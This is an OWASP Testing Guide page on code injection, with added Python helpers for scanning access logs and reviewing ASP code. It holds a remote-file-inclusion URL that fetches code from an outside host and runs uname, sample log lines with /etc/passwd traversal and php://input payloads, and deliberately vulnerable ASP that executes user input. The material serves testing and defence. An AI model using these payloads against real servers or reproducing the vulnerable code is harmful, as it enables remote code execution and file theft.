Testing for Code Injection (OWASP-DV-012)

From OWASP
Revision as of 15:03, 29 December 2006

Brief Summary

This section describes how a tester can check whether it is possible to submit code as input on a web page and have it executed by the web server. More information about Code Injection: http://www.owasp.org/index.php/Code_Injection

Description of the Issue

Code Injection testing involves a tester submitting code as input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, e.g. ASP, PHP, etc. Proper validation and secure coding practices need to be employed to protect against these attacks.

Black Box testing and example

Testing for PHP Injection vulnerabilities:

Using the query string, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file:

http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a


Result Expected:

The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.
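The request above leaves a distinctive trace in the web server's access log: an include-style parameter whose value is itself a URL. The following scanner, added here as an example and not part of the OWASP Testing Guide, parses constructed combined-format log lines (the first mirrors the request shown on this page; the other hosts, paths and parameter names are invented) and flags parameter values that point at remote URLs. It goes slightly beyond the page's case by also flagging PHP stream wrappers and directory traversal in the same parameters, since those reach the same include sink.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache/nginx "combined" style). The first
# reproduces the request from the page; the others are invented for the example.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Dec/2006:15:03:00 +0000] "GET /uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a HTTP/1.1" 200 512
203.0.113.6 - - [29/Dec/2006:15:04:10 +0000] "GET /uptime.php?pin=status HTTP/1.1" 200 320
203.0.113.7 - - [29/Dec/2006:15:05:22 +0000] "GET /page.php?file=../../etc/passwd HTTP/1.1" 404 210
203.0.113.8 - - [29/Dec/2006:15:06:01 +0000] "GET /page.php?file=php://input HTTP/1.1" 200 300
"""

# The quoted request line: method, target (path + query), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators that a parameter value is being used to pull in remote or
# unexpected code rather than name one of the application's own files.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.I)      # remote file inclusion
WRAPPER_RE = re.compile(r'^(?:php|data|expect|file)://', re.I)  # PHP stream wrappers
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')        # ../ path traversal


def classify_value(value):
    """Return the indicator kind for a single parameter value, or None if benign."""
    v = unquote(value)
    if REMOTE_SCHEME_RE.search(v):
        return "remote-url"
    if WRAPPER_RE.search(v):
        return "stream-wrapper"
    if TRAVERSAL_RE.search(v):
        return "traversal"
    return None


def scan_line(line):
    """Return a list of findings ({param, kind, value}) for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qsl splits on '&' and on the first '=' only, so a value that itself
    # contains a URL with a '?' (as in the page's example) is kept intact.
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_value(value)
        if kind:
            findings.append({"param": name, "kind": kind, "value": unquote(value)})
    return findings


def scan_log(text):
    """Scan a whole log; returns (line_number, parameter, kind) tuples."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for f in scan_line(line):
            results.append((lineno, f["param"], f["kind"]))
    return results


if __name__ == "__main__":
    for lineno, param, kind in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: parameter '{param}' looks like {kind}")
```

The scanner only looks at the parameter value, not the parameter name, so it does not depend on knowing which parameters the application feeds to include(). A value matching any of the three classes should be correlated with the server's include-related errors and with outbound connections from the web server, which is where a successful remote inclusion becomes visible.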

Gray Box testing and example

Testing for ASP Code Injection vulnerabilities

Examine the ASP code for user input that is used in execution functions. For example, can the user enter commands into the Data input field? Here, the ASP code saves the input to a file and then executes that file:

<%
If not isEmpty(Request( "Data" ) ) Then
    Dim fso, f
    'User input Data is written to a file named data.txt
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
    f.Write Request("Data") & vbCrLf
    f.close
    Set f = nothing
    Set fso = Nothing
    'Data.txt is executed
    Server.Execute( "data.txt" )
Else
%>
<form>
<input name="Data" /><input type="submit" name="Enter Data" />
</form>
<%
End If
%>
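The gray-box check above is a code-review task: find where request input enters, and whether it reaches an execution function directly or through a file that is later executed. The following line-oriented review helper, added here as an example and not part of the OWASP Testing Guide, runs that check over the page's ASP fragment (embedded as a string) and over two constructed samples: a fixed variant that stores the input but never executes it, and a one-liner that passes input straight to Execute. IsValidToken in the fixed sample is a hypothetical helper, not a VBScript built-in. The heuristic tracks Request(...) values written to files opened via Server.MapPath and variables assigned directly from Request; it is a review aid, not a full taint analysis.

```python
import re

# The vulnerable fragment from the page, embedded verbatim as a string.
VULNERABLE_ASP = '''<%
If not isEmpty(Request( "Data" ) ) Then
  Dim fso, f
  'User input Data is written to a file named data.txt
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
  f.Write Request("Data") & vbCrLf
  f.close
  Set f = nothing
  Set fso = Nothing
  'Data.txt is executed
  Server.Execute( "data.txt" )
Else
%>
<form>
<input name="Data" /><input type="submit" name="Enter Data" />
</form>
<%
End If
%>'''

# Constructed fixed variant: input is length-checked and appended to a log that
# is never executed. IsValidToken is a hypothetical helper for the example.
SAFE_ASP = '''<%
If Not IsEmpty(Request("Data")) Then
  Dim entry, fso, f
  entry = Request("Data")
  ' Accept only short tokens, and never execute what was saved
  If Len(entry) > 64 Or Not IsValidToken(entry) Then
    Response.Write "Rejected"
  Else
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(Server.MapPath("data.log"), 8, True)
    f.Write entry & vbCrLf
    f.Close
  End If
End If
%>'''

# Constructed one-liner: request input handed directly to an execution function.
DIRECT_ASP = '<% Execute(Request("Code")) %>'

INPUT_RE = re.compile(r'Request(?:\.Form|\.QueryString|\.Cookies)?\s*\(\s*"([^"]+)"\s*\)', re.I)
ASSIGN_RE = re.compile(r'^\s*(?:Dim\s+)?(\w+)\s*=\s*Request\b', re.I)
OPEN_RE = re.compile(r'Set\s+(\w+)\s*=\s*\w+\.(?:OpenTextFile|CreateTextFile)\s*\('
                     r'\s*Server\.MapPath\s*\(\s*"([^"]+)"', re.I)
WRITE_RE = re.compile(r'\b(\w+)\.Write(?:Line)?\b', re.I)
# Execution sinks, followed either by a literal file name or by Request(...).
SINK_RE = re.compile(r'\b(Server\.Execute|Server\.Transfer|ExecuteGlobal|Execute|Eval)'
                     r'\s*\(\s*(?:"([^"]+)"|Request\b)', re.I)


def review_asp(source):
    """Return (line_number, description) findings for request input that reaches
    an execution sink, either directly or via a file that is later executed."""
    findings = []
    handles = {}        # file handle variable -> file name opened for writing
    tainted_files = {}  # file name -> line on which request input was written to it
    tainted_vars = set()
    for n, line in enumerate(source.splitlines(), 1):
        code = line.split("'", 1)[0]  # drop VBScript comments (no quotes in literals here)
        a = ASSIGN_RE.search(code)
        if a:
            tainted_vars.add(a.group(1).lower())
        o = OPEN_RE.search(code)
        if o:
            handles[o.group(1).lower()] = o.group(2)
        w = WRITE_RE.search(code)
        if w:
            carries_input = bool(INPUT_RE.search(code)) or any(
                re.search(rf'\b{re.escape(v)}\b', code, re.I) for v in tainted_vars)
            fname = handles.get(w.group(1).lower())
            if carries_input and fname:
                tainted_files[fname.lower()] = n
        for s in SINK_RE.finditer(code):
            sink, literal = s.group(1), s.group(2)
            if literal is None:
                findings.append((n, f"user input passed directly to {sink}"))
            elif literal.lower() in tainted_files:
                findings.append((n, f"{sink} runs {literal}, which received user input "
                                    f"on line {tainted_files[literal.lower()]}"))
    return findings


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_ASP), ("safe", SAFE_ASP), ("direct", DIRECT_ASP)):
        print(name, review_asp(src) or "no findings")
```

The fixed sample is reported clean because the file it writes is never handed to an execution function, which is the actual remediation: user-supplied text may be stored, but nothing the request controls should be passed to Server.Execute, Execute, ExecuteGlobal or Eval.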


References


